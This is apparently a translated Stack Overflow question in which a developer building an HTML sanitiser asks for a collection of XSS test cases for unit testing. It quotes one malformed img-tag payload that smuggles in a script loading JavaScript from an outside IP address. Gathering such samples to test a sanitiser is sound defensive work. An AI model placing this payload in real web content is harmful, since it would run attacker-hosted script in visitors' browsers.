作者热门文章
- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我想写一个 html sanitiser,显然要测试/证明它是否正常工作,我需要一组 XSS 示例来对抗它以查看它的性能。这是一个 nice example from Coding Horror
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
我知道有一个 Mime Torture Test其中包含几封带有附件的嵌套电子邮件,用于测试 Mime 解码器(如果它们可以正确解码,则证明它们可以工作)。我基本上是在寻找 XSS 的等价物,即我可以扔到我的 sanitizer 中以确保它正常工作的狡猾 html 示例列表。
如果任何人也有关于如何编写 sanitizer 的任何好的资源(即人们尝试使用的常见漏洞利用等),我们也将不胜感激。
提前致谢:-)
编辑:抱歉,如果之前不清楚,但我经过了一系列折磨测试,所以我可以为 sanitizer 编写单元测试,而不是在浏览器中测试它,等等。理论上的源数据可能已经到来从任何地方 - 不仅仅是浏览器。
最佳答案
关于testing - XSS 酷刑测试——它存在吗?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/255723/
我是一名优秀的程序员,十分优秀!